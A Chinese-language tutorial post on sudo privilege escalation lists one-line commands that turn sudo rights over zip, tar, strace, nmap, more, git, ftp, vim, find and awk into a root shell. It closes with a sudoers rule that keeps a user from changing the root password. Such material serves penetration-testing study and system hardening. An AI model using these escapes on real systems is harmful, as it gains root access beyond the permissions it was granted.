sudo提权

简介: 参考文献:http://zone.secevery.com/article/989https://www.anquanke.com/post/id/158511sudo概念:sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。

参考文献:http://zone.secevery.com/article/989
https://www.anquanke.com/post/id/158511

sudo概念:

sudo (Substitute User and Do 的简写)临时授权,可以临时让其以root 权限运行某个程序。在/etc/sudoers中设置了可执行sudo指令的用户。

各种提权操作

①su

test@ubuntu:/tmp$ sudo su - root

②zip

test@ubuntu:/tmp$ sudo zip /tmp/1.zip /tmp/test -T --unzip-command="sh -c /bin/bash"#1.zip是随手添加进去的一个zip文件
#-T 表示测试1.zip的完整性
# --unzip-command 与-T 一起使用,可以指定自定义命令用于解压1.zip
#可以自定义用于解压test.zip 的的命令,自定义解压命令是以root权限执行的,指定为sh -c /bin/bash, 获取一个root权限的shell

③tar

test@ubuntu:/tmp$sudo tar cf /dev/null test --checkpoint=1 --checkpoint-action=exec=/bin/bash
#–checkpoint-action 选项是提权点,可以自定义需要执行的动作,指定为exec=/bin/bash,获取一个root权限的shell

④strace

test@ubuntu:/tmp$sudo strace -o/dev/null /bin/bash
#strace 以root权限运行跟踪调试/bin/bash, 从而获取root权限的shell

⑤nmap

test@ubuntu:/tmp$ echo "os.execute('/bin/sh')">/tmp/shell.nse
test@ubuntu:/tmp$ sudo nmap --script=/tmp/shell.nse

⑥more

test@ubuntu:/tmp$sudo more /etc/rsyslog.conf
然后加上!/bin/bash 即可获取root权限的shell

⑦git

test@ubuntu:/tmp$sudo git help status
然后加上!/bin/bash 即可获取root权限的shell

⑧ftp

test@ubuntu:/tmp$ sudo ftp
ftp> !/bin/bash

⑨vim

test@ubuntu:/tmp$ sudo vim -c '!sh

⑩find

test@ubuntu:/tmp$ sudo find /bin/ -name ls -exec /bin/bash \;
#对于find 检索到的每一个结果,都执行/bin/bash, 是以root权限执行的

⑩①passwd

test@ubuntu:/tmp$ sudo passwd
Enter new UNIX password: 
Retype new UNIX password: 

⑩②awk

test@ubuntu:/etc$ sudo awk 'BEGIN {system("/bin/bash")}'

防止有sudo权限的普通用户修改root用户的密码

/etc/sudoers添加:

test  ALL=(root)     !/usr/bin/passwd, /usr/bin/passwd [A-Za-z]*, !/usr/bin/passwd root
#用户账号,登陆来源的主机名,可切换的身份,可执行的命令
目录
相关文章
|
6月前
|
安全 网络协议 Shell
Linux sudo 以其他身份来执行命令
Linux sudo 以其他身份来执行命令
67 0
|
安全 Unix Linux
CentOS7 Sudo本地提权漏洞修复实践
CentOS7 Sudo本地提权漏洞修复实践
965 0
CentOS7 Sudo本地提权漏洞修复实践
|
3月前
|
Ubuntu 网络安全 数据安全/隐私保护
Ubuntu 普通用户修改sudoers导致无法使用sudo的解决办法
Ubuntu 普通用户修改sudoers导致无法使用sudo的解决办法
114 2
|
开发工具 Windows
如何让普通用户使用sudo?
如何让普通用户使用sudo?
如何让普通用户使用sudo?
|
6月前
|
Linux 开发工具
linux sudo指令提权
linux sudo指令提权
|
6月前
|
Linux Shell 数据安全/隐私保护
linux命令之sudo/su
linux命令之sudo/su
112 7
|
6月前
|
Shell Linux
用户权限提升Sudo
sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。
94 0
|
网络安全 数据安全/隐私保护
sudo 权限问题
sudo 权限问题
223 1
|
Linux 数据安全/隐私保护
Linux系统之普通用户sudo提权配置
Linux系统之普通用户sudo提权配置
323 0